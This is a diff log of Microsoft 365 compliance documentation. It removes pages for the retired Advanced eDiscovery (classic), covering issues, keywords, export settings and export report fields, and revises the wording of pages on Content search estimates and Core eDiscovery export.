-5. In the **Select issue** list, select whether to apply the keywords list to "All issues" or to selected issues.
-
-6. In **Description**, type the keywords list (optional).
-
- ![Add new keywords](../media/1683a71f-0875-48fc-b4ef-01f3b0e8e8e9.png)
-
-7. Click **OK** when done. The created list is added to the keywords list table and can be edited or deleted.
-
- ![Relevance Setup Keywords list](../media/a05d5ec0-8bde-470d-97e2-456b169281d6.png)
-
-The user-defined keywords will be displayed, in the specified colors in Relevance \> Tag.
-
-## Specifying Relevance setup advanced settings
-
-These settings affect the Track and Decide graphs in Relevance.
-
-1. In the **Relevance \> Relevance setup** tab, select **Advanced settings**.
-
-2. In the **Cost parameters** dialog, make the following selections:
-
-1. In the **Cost review per hour ($)** list, select the amount in dollars or accept the default.
-
-2. In the **Number of files reviewed by hour** list, select the amount or accept the default.
-
- ![Relevance setup cost parameters](../media/bab7b5b7-6297-4e7c-b0a6-ba5aa8b21787.png)
-
-3. Click **Save**. The selected settings are saved.
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Defining issues and assigning users](define-issues-and-assign-users.md)
-
-[Setting up loads to add imported files](set-up-loads-to-add-imported-files.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/define-issues-and-assign-users https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/define-issues-and-assign-users.md deleted file mode 100644
@@ -1,79 +0,0 @@
-title: "Define issues and assign users in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: 48d37ee7-05bd-4cb8-9723-a8959ad23fbe
-description: "Learn how to add or edit an issue, including assigning users to it, or delete an issue for an eDiscovery case in Advanced eDiscovery."
-
-# Define issues and assign users in Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-In Advanced eDiscovery, one or more issues can be defined within a case. Defining issues allows further categorization of topics. When connecting to a new case, a single default issue is provided. You can edit the default issue name and assign users to the issue.
-
-## Adding or editing an issue and assigning users
-
-1. In the **Relevance \> Relevance setup** tab \> select **Issues**.
-
- ![Relevance Setup issues](../media/dfd8f9ef-b167-4ed9-980e-00ae98a97169.png)
-
-2. To add an issue, click the ** + ** icon. The **Add issue** dialog is displayed.
-
- ![Relevance setup add issue](../media/c8e94982-139a-472a-b85d-282f2d742046.png)
-
- To edit an issue, click the **Edit** icon.
-
-3. In **Issue name**, type a name that is descriptive and significant to the case.
-
-4. In **Description**, type information about the issue.
-
-5. Select the **Enable concurrent training** check box to enable the option. This setting enables multiple reviewers to work on the same issue simultaneously (in separate samples).
-
-6. In **Assign users to issue**, in the **All users** list, select a user to be assigned to the issue and then click the right-facing arrow to add the user to the **Selected users** list. Repeat as necessary. In the window shown above, "Admin" is shown as a selected user.
-
- > [!NOTE]
- > User assignment to issues can be modified before or after a Relevance training cycle.
-
-7. In **Selected users**, from the drop-down list next to the name of the selected user, select one of the following Sampling modes:
-
- - **On**: The files can be viewed and tagged. This is the default setting.
-
- - **Idle**: The files can be viewed; tagged is optional.
-
- - **Off**: The files cannot be viewed or tagged.
-
-8. When done adding issues, click **OK**.
-
-## Deleting issues
-
-Issues may be deleted (meaning, removed from the database) only immediately after they were defined and no actual work has been done for that issue.
-
-1. In the **Relevance \> Relevance setup** tab, select **Issues**.
-
-2. Select the issue to delete from the database, and then click **Delete**.
-
-3. A confirmation message is displayed. Click **Yes** to confirm.
-
-4. Click **OK**.
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Setting up loads to add imported files](set-up-loads-to-add-imported-files.md)
-
-[Defining highlighted keywords and advanced options](define-highlighted-keywords-and-advanced-options.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/differences-between-estimated-and-actual-ediscovery-search-results https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/differences-between-estimated-and-actual-ediscovery-search-results.md
@@ -23,21 +23,20 @@ description: "Understand why estimated and actual search results may vary in sea
# Differences between estimated and actual eDiscovery search results
-This topic applies to searches that you can run using one of the following Microsoft eDiscovery tools:
+This topic applies to searches that you can run using one of the following Microsoft 365 eDiscovery tools:
-- Content Search in the Security & Compliance Center <br/> -- In-Place eDiscovery in the Exchange admin center (EAC) <br/> -- The eDiscovery Center in SharePoint Online <br/>
+- Content search
+- Core eDiscovery
-When you run an eDiscovery search, the tool you're using will return an estimate of the number of items (and their total size) that meet the search criteria. For example, when you run a search in the Security & Compliance Center, the estimated search results are displayed in the details pane for the selected search.
+When you run an eDiscovery search, the tool you're using will return an estimate of the number of items (and their total size) that meet the search criteria. For example, when you run a search in the Microsoft 365 compliance center, the estimated search results are displayed on the flyout page for the selected search.
![Estimate of results displayed in details pane of selected search](../media/74e4ce83-40be-41a9-b60f-5ad447e79fe4.png) This is the same estimate of total size and number of items that is displayed in the eDiscovery Export Tool when you export results to a local computer and in the Export Summary report that's downloaded with the search results.
-**Estimated results in the eDiscovery Export Tool**
+**Estimated results in the eDiscovery Export tool**
-![Estimated results in eDiscovery Export Tool](../media/d34312a5-0ee6-49aa-9460-7ea0015a6e66.png)
+![Estimated results in eDiscovery Export tool](../media/d34312a5-0ee6-49aa-9460-7ea0015a6e66.png)
**Estimated results in Export Summary report**
@@ -55,9 +54,9 @@ Here are some reasons for these differences:
Although rare, even in the case when a hold is applied, maintenance of built-in calendar items (which aren't editable by the user, but are included in many search results) may be removed from time to time. This periodic removal of calendar items will result in fewer items that are exported. -- **Unindexed items**. Items that are unindexed for search can cause differences between estimated and actual search results. For example, In-Place eDiscovery in Exchange and the eDiscovery Center in SharePoint don't include unindexed items (that don't meet the search criteria) when you run a search to estimate the search results. But you can include unindexed items when you export the search results. If you include unindexed items when exporting search results, there might be more items that are exported. This will cause a difference between the estimated and exported search results.
+- **Unindexed items**. Items that are unindexed for search can cause differences between estimated and actual search results. You can include unindexed items when you export the search results. If you include unindexed items when exporting search results, there might be more items that are exported. This will cause a difference between the estimated and exported search results.
- When using the Content Search tool in the Security & Compliance Center, you have the option to include unindexed items in the search estimate. The number of unindexed items returned by the search is listed in the details pane together with the other estimated search results. Any unindexed items would also be included in the total size of the estimated search results. When you export search results, you have the option to include or not include unindexed items. How you configure these options might result in differences between estimated and the actual search results that are downloaded.
+ When using the Content search tool, you have the option to include unindexed items in the search estimate. The number of unindexed items returned by the search is listed on the flyout page together with the other estimated search results. Any unindexed items would also be included in the total size of the estimated search results. When you export search results, you have the option to include or not include unindexed items. How you configure these options might result in differences between estimated and the actual search results that are downloaded.
- **Exporting the results of a Content Search that includes all content locations**. If the search that you're exporting results from was a search of all content locations in your organization, then only the unindexed items from content locations that contain items that match the search criteria will be exported. In other words, if no search results are found in a mailbox or site, then any unindexed items in that mailbox or site won't be exported. However, unindexed items from all content locations (even those that don't contain items that match the search query) will be included in the estimated search results.
@@ -72,12 +71,6 @@ Here are some reasons for these differences:
- **De-duplication**. For Exchange items, de-duplication reduces the number of items that are exported. You have the option to de-duplicate the search results when you export them. For Exchange messages, this means that only a single instance of a message is exported, even though that message might be found in multiple mailboxes. The estimated search results include every instance of a message. So if you choose the de-duplication option when exporting search results, the actual number of items that are exported might be considerably less than the estimated number of items. Another thing to keep in mind if you choose the de-duplication option is that all Exchange items are exported in a single PST file and the folder structure from the source mailboxes isn't preserved. The exported PST file just contains the email items. However, a search results report contains an entry for each exported message that identifies the source mailbox where the message is located. This helps you identify all mailboxes that contain a duplicate message. If you don't enable de-duplication, a separate PST file is exported for each mailbox included in the search. -
-## Exporting unindexed items from the eDiscovery Center in SharePoint Online
-
-In the eDiscovery Center in SharePoint Online, you have the option to include unindexed content (from Exchange and SharePoint) when you export the results of an eDiscovery search. You do this by selecting the **Include items that are encrypted or have an unrecognized format** option. Unindexed items (also called uncrawlable in SharePoint) are items in Exchange and SharePoint that for some reason weren't indexed for search. Unindexed Exchange items are listed in the **Exchange Index Errors** report that's included when you export search results. Similarly, unindexed SharePoint items are listed in **SharePoint Index Errors** report. When you export unindexed items, they're downloaded to a folder named **Uncrawlable**. Unindexed Exchange items are included in a PST file; each unindexed document from SharePoint is downloaded too. The number of unindexed items (if there are any) is listed in each index errors report. The number of unindexed items in the reports should match the number of unindexed items that are downloaded.
-
- **What are some reasons if the number of exported unindexed items don't match the number of items in the index error report?** As previously explained, it's possible that items have been purged from Microsoft 365 between the time the search estimate was run and the time the search results were exported. A similar discrepancy can occur for unindexed items. For example, the search index might be out date when search results are exported. This would mean that an unindexed item that was exported with the search results might not be listed in the index errors report because the item wasn't indexed at the time the search results were exported. This would result in more unindexed items being export than are listed in the index error report. Similarly, an unindexed item listed in the index error report could have been purged from Microsoft 365 before the search index was updated. This results in fewer exported unindexed items than are listed in the index error report.
-
+
> [!NOTE] > If you don't select the **Include items that are encrypted or have an unrecognized format** option when you export search results or just download the reports, the index error reports are downloaded but they don't have any entries. This doesn't mean there aren't any indexing errors. It just means that unindexed items weren't included in the export.
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/ediscovery.md
@@ -30,9 +30,6 @@ Microsoft 365 provides the following eDiscovery tools:
- [Advanced eDiscovery](#advanced-ediscovery)
-> [!NOTE]
-> Advanced eDiscovery (classic) (also called *Advanced eDiscovery v1.0*), which is the version of Advanced eDiscovery available in a Core eDiscovery case by clicking **Switch to Advanced eDiscovery**, is being retired. Its functionality has been replaced by the Advanced eDiscovery solution in Microsoft 365. For more information about the retirement of Advanced eDiscovery v1.0, see [Retirement of legacy eDiscovery tools](legacy-ediscovery-retirement.md#advanced-ediscovery-v10).
- ## Content Search The following table contains links to topics that will help you use the Content Search tool.
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/export-case-data-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/export-case-data-in-advanced-ediscovery.md deleted file mode 100644
@@ -1,45 +0,0 @@
-title: "Export case data in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: c3198d1c-51b4-4280-87c5-269b47246d33
-description: "Understand the guidelines for exporting eDiscovery case data and results for review using the Export process in Advanced eDiscovery."
-ms.custom: seo-marvel-apr2020
-
-# Export case data in Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-The Export process in Advanced eDiscovery enables the exporting of Advanced eDiscovery content and results for external review.
-
-## Guidelines for exporting data
--- You can review the export data generated from Advanced eDiscovery, for example, to distribute pertinent elements to the document review team or export to an external document review tool.
-
-- You can generate and manipulate the export output at any time during and after Advanced eDiscovery processing. In a standard scenario, significant results are achieved after Relevance training and Batch calculation are successfully completed. For example, you can generate a sample of the 1,000 most relevant files and evaluate Advanced eDiscovery performance before you proceed.
-
-- Exporting a large amount of data to a database may have a significant impact on the required database size and the required configuration of the Advanced eDiscovery database.
-
-## Related topics
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Exporting results ](export-results-in-advanced-ediscovery.md)
-
-[Viewing Batch history and Export results](view-batch-history-and-export-past-results.md)
-
-[Export report fields](export-report-fields-in-advanced-ediscovery.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/export-content-in-core-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/export-content-in-core-ediscovery.md
@@ -100,5 +100,3 @@ As an alternative to exporting the results of a single search associated with a
- If you restart the export, any changes to the queries of the searches that make up the export job won't affect the search results that are retrieved. When you restart an export, the same combined search query job that was run when the export job was created will be run again. - Also, if you restart an export, the search results that are copied to the Azure Storage location overwrites the previous results. The previous results that were copied won't be available to be downloaded.--- Preparing the results of multiple searches for analysis in Advanced eDiscovery (classic) isn't available. You can only prepare the results of a single search for analysis in Advanced eDiscovery (classic).
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/export-report-fields-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/export-report-fields-in-advanced-ediscovery.md deleted file mode 100644
@@ -1,144 +0,0 @@
-title: "Export report fields in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: chrfox
-author: chrfox
-manager: laurawi
-titleSuffix: Office 365
-audience: Admin
-ms.topic: reference
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: 840a5aff-ecd0-4e56-ad22-fe99bc143687
-description: This article describes all of the fields that are included in the Export reports for Advanced eDiscovery.
-ms.custom: seo-marvel-apr2020
-
-# Export report fields in Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-This topic describes the Advanced eDiscovery Export report fields for the Standard and All templates.
-
-## Export report fields
-
-The following table lists the fields for each export template.
-
-|**Export field name**|**Group**|**Description**|**Available in Standard template**|**Available in All template**|
-|:-----|:-----|:-----|:-----|:-----|
-|Row_number <br/> |General <br/> |Row number. <br/> |Yes <br/> |Yes <br/> |
-|File_ID <br/> |General <br/> |File ID. <br/> |Yes <br/> |Yes <br/> |
-|File_class <br/> |Processing <br/> |File class. <br/> |Yes <br/> |Yes <br/> |
-|Family_ID <br/> |Processing <br/> |Numeric identifier that is used to group files (usually email instance and its attachments). <br/> |Yes <br/> |Yes <br/> |
-|For_review <br/> |Processing <br/> |Flag to indicate that the field will be included in export for review. <br/> |Yes <br/> |Yes <br/> |
-|Native_file_name <br/> |Processing <br/> |Native file name, without referencing folder and extension. <br/> |Yes <br/> |Yes <br/> |
-|Custodians <br/> |General <br/> |Custodian of the file. <br/> |Yes <br/> |Yes <br/> |
-|Set_ID <br/> |Analyze <br/> |"ND set" or "Email set" id. <br/> |Yes <br/> |Yes <br/> |
-|Inclusive_type <br/> |Email <br/> |Indicates if file is inclusive, according to the following values: 0 - not inclusive, 1 - Inclusive, 2 - Inclusive minus, 3 - Inclusive copy. <br/> |Yes <br/> |Yes <br/> |
-|Marked_as_pivot <br/> |Near duplicates <br/> |Indicates if the file is a pivot. <br/> |Yes <br/> |Yes <br/> |
-|Similarity_percent <br/> |Near duplicates <br/> |Percentage of similarity relative to the pivot. <br/> |Yes <br/> |Yes <br/> |
-|Duplicate_subset <br/> |Near duplicates <br/> |Unique identifier of the duplicate subset. Indicates whether the file has exact text duplicates. <br/> |Yes <br/> |Yes <br/> |
-|Date <br/> |General <br/> |Date of file (depends on file type - email: date sent; document: date modified). <br/> |Yes <br/> |Yes <br/> |
-|Dominant_theme <br/> |Analyze <br/> |Primary Theme of the file. <br/> |Yes <br/> |Yes <br/> |
-|Themes_list <br/> |Themes <br/> |List of Theme names. <br/> |Yes <br/> |Yes <br/> |
-|ND_set <br/> |EquiSet <br/> |Unique numeric identifier of a Nearduplicate set. <br/> |Yes <br/> |Yes <br/> |
-|Email_set <br/> |Email <br/> |Unique numeric identifier of an Email set. <br/> |Yes <br/> |Yes <br/> |
-|Email_thread <br/> |Email <br/> |Describes the position of the email within the Email set Consists of all Node IDs from the root to the current email, separated by periods. <br/> |Yes <br/> |Yes <br/> |
-|Email_subject <br/> |Email <br/> |Subject of the email. <br/> |Yes <br/> |Yes <br/> |
-|Email_date_sent <br/> |Email <br/> |Date on which the email was sent. <br/> |Yes <br/> |Yes <br/> |
-|Email_participants <br/> |Email <br/> |Email addresses of all participants in an email thread, including for missing links. <br/> |Yes <br/> |Yes <br/> |
-|Email_participant_domains <br/> |Email <br/> |Domains of all participants in an email thread, including for missing link. <br/> |Yes <br/> |Yes <br/> |
-|Email_sender <br/> |Email <br/> |Email sender name and/or address. <br/> |Yes <br/> |Yes <br/> |
-|Email_sender_domain <br/> |Email <br/> |Email sender's domain. <br/> |Yes <br/> |Yes <br/> |
-|Email_to <br/> |Email <br/> |To recipient of the email. <br/> |Yes <br/> |Yes <br/> |
-|Email_cc <br/> |Email <br/> |CC recipient of the email. <br/> |Yes <br/> |Yes <br/> |
-|Email_bcc <br/> |Email <br/> |BCC recipient of the email. <br/> |Yes <br/> |Yes <br/> |
-|Email_recipient_domains <br/> |Email <br/> |Email recipients domains (To, CC, and BCC). <br/> |Yes <br/> |Yes <br/> |
-|Email_date_received <br/> |Email <br/> |Date on which email was received. <br/> |Yes <br/> |Yes <br/> |
-|Email_action <br/> |Email <br/> |Values: according to Email Subject: "Forward" (for "FW:"), "Reply" (for "RE:") or "Other" (other Subject text). <br/> |Yes <br/> |Yes <br/> |
-|Meeting_Start_Date/Time <br/> ||The date and time at which a meeting item started. <br/> |Yes <br/> |Yes <br/> |
-|Meeting_End_Date/Time <br/> ||The date and time at which a meeting item ended. <br/> |Yes <br/> |Yes <br/> |
-|File_relevance_score <br/> |Relevance <br/> |Relevance score (0-100). Per issue. <br/> |Yes <br/> |Yes <br/> |
-|Family_relevance_score <br/> |Relevance <br/> |Max family Relevance score (0-100). Per issue. <br/> |Yes <br/> |Yes <br/> |
-|Relevance_tag <br/> |Relevance <br/> |Tagging of the file, if the file was manually tagged in Relevance. Per issue. <br/> |Yes <br/> |Yes <br/> |
-|Relevance_load_group <br/> |Relevance <br/> |Relevance Load group, of the specified file, with a field per issue. <br/> |Yes <br/> |Yes <br/> |
-|Normalized_relevance_score <br/> |Relevance <br/> |Normalized Relevance score (0-100), which is comparable between issues and loads. <br/> |Yes <br/> |Yes <br/> |
-|Marked_as_seed <br/> |Relevance <br/> |Tagging of the file, if it was set to be as a seed file in Relevance Per issue/category. <br/> |Yes <br/> |Yes <br/> |
-|Marked_as_pre-tagged <br/> |Relevance <br/> |Tagging of the file, if it was set as pre-tagged in Relevance Per issue/category. <br/> |Yes <br/> |Yes <br/> |
-|Relevance_status_description <br/> |Relevance <br/> |Description of the relevance status. <br/> |Yes <br/> |Yes <br/> |
-|Comment <br/> |General <br/> |Comment entered by the user. <br/> |Yes <br/> |Yes <br/> |
-|Export_input_path <br/> |Processing <br/> |Export input path. <br/> |Yes <br/> |Yes <br/> |
-|Pivot_ID <br/> |Near Duplicates <br/> |Pivot ID of the file. <br/> |Yes <br/> |Yes <br/> |
-|Family_size <br/> |Processing <br/> |Number of files in a family. <br/> |Yes <br/> |Yes <br/> |
-|Native_type <br/> |Processing <br/> |Native file type. For example, spreadsheet or presentation. <br/> |Yes <br/> |Yes <br/> |
-|Native_MD5 <br/> |Processing <br/> |MD5 hash value of the native file. <br/> |Yes <br/> |Yes <br/> |
-|Native_size <br/> |Processing <br/> |Native file size. <br/> |Yes <br/> |Yes <br/> |
-|Native_extension <br/> |Processing <br/> |Native file extension. <br/> |Yes <br/> |Yes <br/> |
-|Doc_date_modified <br/> |Document Properties <br/> |Date native file was modified, taken from the file's metadata. <br/> |Yes <br/> |Yes <br/> |
-|Doc_date_created <br/> |Document Properties <br/> |Date native file was created, taken from the file's metadata. <br/> |Yes <br/> |Yes <br/> |
-|Doc_modified_by <br/> |Document Properties <br/> |User who modified native file, taken from the file's metadata. <br/> |Yes <br/> |Yes <br/> |
-|O365_date_modified <br/> |Document Properties <br/> |Date native file was modified, taken from the either SharePoint or Exchange fields. <br/> |Yes <br/> |Yes <br/> |
-|O365_date_created <br/> |Document Properties <br/> |Date native file was created, taken from either SharePoint or Exchange fields. <br/> |Yes <br/> |Yes <br/> |
-|O365_modified_by <br/> |Document Properties <br/> |User who last modified native file, taken from either SharePoint or Exchange fields. <br/> |Yes <br/> |Yes <br/> |
-|Compound_path <br/> |Processing <br/> |Native file path including its compound source. <br/> |Yes <br/> |Yes <br/> |
-|Input_path <br/> |Processing <br/> |Path of the input file. <br/> |Yes <br/> |Yes <br/> |
-|Input_date_modified <br/> |Processing <br/> |Date Input file was last modified. <br/> |Yes <br/> |Yes <br/> |
-|ND_ET_sort_excl_attach <br/> |Analyze <br/> |Concatenation of Email set and ND set for review. 'D' is added as a prefix to ND sets, and 'E' is added to Email ssets. <br/> |Yes <br/> |Yes <br/> |
-|ND_ET_sort_incl_attach <br/> |Analyze <br/> |Concatenation of Email set and ND set for review 'D' is added as a prefix to ND sets, and 'E' is added to Email sets. In addition, each email within an Email_set is followed by its appropriate attachments. <br/> |Yes <br/> |Yes <br/> |
-|Deduped_custodians <br/> |General <br/> |Custodians of de-duped files <br/> |Yes <br/> |Yes <br/> |
-|Deduped_file_IDs <br/> |General <br/> |IDs of de-duped files <br/> |Yes <br/> |Yes <br/> |
-|Deduped_paths <br/> |General <br/> |Paths of de-duped files <br/> |Yes <br/> |Yes <br/> |
-|File_key <br/> |General <br/> |Internal identifier for future use. <br/> |Yes <br/> |Yes <br/> |
-|Export_native_path <br/> |Processing <br/> |Path of the native file in the export package. <br/> |Yes <br/> |Yes <br/> |
-|Extracted_text_path <br/> |Processing <br/> |Path of the extracted file. <br/> |Yes <br/> |Yes <br/> |
-|Process_batch <br/> |Processing <br/> |Batch identifier for Import batch. <br/> |Yes <br/> |Yes <br/> |
-|Process_status_ID <br/> |Processing <br/> |Identifier representing Process stage status. <br/> |Yes <br/> |Yes <br/> |
-|Process_status_description <br/> |Processing <br/> |Process stage status description: successful or error description. <br/> |Yes <br/> |Yes <br/> |
-|Export_status_ID <br/> |Processing <br/> |ID of the export status. <br/> |Yes <br/> |Yes <br/> |
-|Export_status_description <br/> |Processing <br/> |Description of the export status; successful or error description. <br/> |Yes <br/> |Yes <br/> |
-|Read_percent <br/> |Relevance <br/> |Read % (0-100). Per issue. <br/> |Yes <br/> |Yes <br/> |
-|Doc_author <br/> |Document properties <br/> |Document properties: author. <br/> |No <br/> |Yes <br/> |
-|Doc_comments <br/> |Document properties <br/> |Document properties: comments. <br/> |No <br/> |Yes <br/> |
-|Doc_keywords <br/> |Document properties <br/> |Document properties: keywords. <br/> |No <br/> |Yes <br/> |
-|Doc_last_saved_by <br/> |Document properties <br/> |Document properties: last saved by. <br/> |No <br/> |Yes <br/> |
-|Doc_revision <br/> |Document properties <br/> |Document properties: revision number. <br/> |No <br/> |Yes <br/> |
-|Doc_subject <br/> |Document properties <br/> |Document properties: subject. <br/> |No <br/> |Yes <br/> |
-|Doc_template <br/> |Document properties <br/> |Document properties: template. <br/> |No <br/> |Yes <br/> |
-|Doc_title <br/> |Document properties <br/> |Document properties: title. <br/> |No <br/> |Yes <br/> |
-|Email_has_attachment <br/> |Email <br/> |Indicates if the email has one or more attachments. <br/> |No <br/> |Yes <br/> |
-|Email_importance <br/> |Email <br/> |Email importance property. <br/> |No <br/> |Yes <br/> |
-|Email_level <br/> |Email <br/> |Indicates email's level within the email thread. For attachments, the value of the attached email. <br/> |No <br/> |Yes <br/> |
-|Email_recipients <br/> |Email <br/> |Email recipients name and/or addresses (To, CC, and BCC). <br/> |No <br/> |Yes <br/> |
-|Email_security <br/> |Email <br/> |Email security property. <br/> |No <br/> |Yes <br/> |
-|Email_sensitivity <br/> |Email <br/> |Email sensitivity property. <br/> |No <br/> |Yes <br/> |
-|Export_batch <br/> |Processing <br/> |File's last Export batch name. <br/> |No <br/> |Yes <br/> |
-|Export_session <br/> |Processing <br/> |File's last Export session Id including date. <br/> |No <br/> |Yes <br/> |
-|Extracted_text_length <br/> |Processing <br/> |Character length of the Extracted text file. <br/> |No <br/> |Yes <br/> |
-|Family_duplicate_set <br/> |Processing <br/> |Numeric Identifier for families that are exact text duplicates of each other (respectively - all members of the families are exact duplicates). <br/> |No <br/> |Yes <br/> |
-|Has_Text <br/> |Processing <br/> |Indicates if there is a text in the file: 0 - no ; 1- yes. <br/> |No <br/> |Yes <br/> |
-|Input_file_ID <br/> |Processing <br/> |ID of the Input file from which file was extracted from. <br/> |No <br/> |Yes <br/> |
-|Native_SHA_256 <br/> |Processing <br/> |SHA-256 hash value of the native file. <br/> |No <br/> |Yes <br/> |
-|O365_authors <br/> |Document properties <br/> |Users who modified native file, taken from either SharePoint or Exchange fields. <br/> |No <br/> |Yes <br/> |
-|O365_created_by <br/> |Document properties <br/> |User who created native file, taken from either SharePoint or Exchange fields. <br/> |No <br/> |Yes <br/> |
-|Parent_node <br/> |Email <br/> |Relates a node in an email thread to the closest parent node that is not a missing link. <br/> |No <br/> |Yes <br/> |
-|Set_order_inclusives_first <br/> |Email <br/> |Emails and attachments: counter chronological order (Inclusives first). Documents: pivots first and the rest by similarity score, descending. <br/> |No <br/> |Yes <br/> |
-|Tagged_By <br/> |Relevance <br/> |User who tagged the file in Relevance for the specific issue. <br/> |No <br/> |Yes <br/> |
-|Word_count <br/> |Analyze <br/> |Number of words in the document. <br/> |No <br/> |Yes <br/> |
-|
-
-## Related Topics
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Exporting case data with Advanced eDiscovery](export-case-data-in-advanced-ediscovery.md)
-
-[Exporting results](export-results-in-advanced-ediscovery.md)
-
-[Viewing batch history and exporting past results](view-batch-history-and-export-past-results.md)
-
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/export-results-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/export-results-in-advanced-ediscovery.md deleted file mode 100644
@@ -1,198 +0,0 @@
-title: "Export results in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: a9951a07-10b3-48cb-b37a-0ffaa24931ad
-description: "Learn how to define options for exporting results from Advanced eDiscovery, including the procedure for specifying parameters for an export batch. "
-
-# Export results in Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-This topic describes the Advanced eDiscovery Export Setup options.
-
- **In this topic:**
-
-- [Defining export batches and sessions](export-results-in-advanced-ediscovery.md#BK_Define)
-
-- [Incremental and additional exports](export-results-in-advanced-ediscovery.md#BK_IncrementalReports)
-
-- [Set up batch export parameters](export-results-in-advanced-ediscovery.md#BK_SetUpExport)
-
-- [Export report output files](export-results-in-advanced-ediscovery.md#BK_ExportOutputFIles)
-
-## Defining export batches and sessions
-<a name="BK_Define"> </a>
-
-An export batch allows export processing using a set of defined parameters. Advanced eDiscovery enables you to define batches to customize each export.
-
-Parameters are defined per export batch. A batch named "Export batch 01" is created by default for the first batch of a case. You can also edit the batch name and description.
-
-An export session is an execution of Advanced eDiscovery Export within an export batch.
-
-## Incremental and additional exports
-<a name="BK_IncrementalReports"> </a>
-
-You can run multiple export sessions within an export batch, to ensure consistent results based on the same export template and parameters. For each session within a batch, you can export analytics for newly processed case data and process each "incrementally."
-
-In order to export using a different set of parameters, you first need to create a new batch. The first session in the new batch will produce results for files processed in the case so far, whether or not these files were imported and processed over one or multiple Imports. Each batch recalculates pivots, similarity, inclusives, etc. Sessions use the parameters defined for the batch and do not recalculate pivots, similarity, inclusives, etc. for each session execution.
-
-For example, assume a case was imported and its data analyzed. In order to retrieve Near-duplicates and Email Threading results for the incremental data, click **Create export session** in the same batch that was previously used to export data.
-
-## Set up batch export parameters
-<a name="BK_SetUpExport"> </a>
-
-The eDiscovery Export Tool is used to export search results from Advanced eDiscovery to your local computer.
-
-1. In Advanced eDiscovery, select a Case and click **Export** \> **Setup**.
-
- - From the **Export batch** list, select the batch name or export results to Export batch 01, (the default batch).
-
- - To export results for new files that you added to an existing case, continue with your current batch. To create a session in the batch, select the same batch number and click **Create export session** You can use this option to export the same parameters as the previous batch, in an incremental manner.
-
- - To export to a new batch, click **Add** ![add icon](../media/c2dd8b3a-5a22-412c-a7fa-143f5b2b5612.png)and enter a new name in **Batch name** (or accept the default) and a description in **Batch description**. Click **OK**.
-
- - To edit a batch name or description, select the name in **Export batch**, click **Edit** ![Edit icon](../media/3d613660-7602-4df2-bdb9-14e9ca2f9cf2.png), and then modify the fields.
-
- > [!NOTE]
- > After you've run sessions for an export batch, they cannot be deleted. In addition, only some parameters can be edited once the first session is run.
-
- - To create a duplicate export batch, choose **Duplicate export batch** ![Create a duplicate export batch icon](../media/3f6d5f59-e842-4946-a493-473528af0119.jpg) and enter a name and a description for the duplicate batch in the panel.
-
- - To delete an export batch, choose **Delete** ![Delete an export batch icon](../media/92a9f8e0-d469-48da-addb-69365e7ffb6f.jpg).
-
- - To view the history of a batch, choose **Batch history** ![View history icon](../media/a80cc320-d96c-4d91-8884-75fe2cb147e2.jpg).
-
-2. Under **Population**, select **Include only files above Relevance cut-off score** and/or **Refine export batch** if you want to fine-tune the settings for your export batch.
-
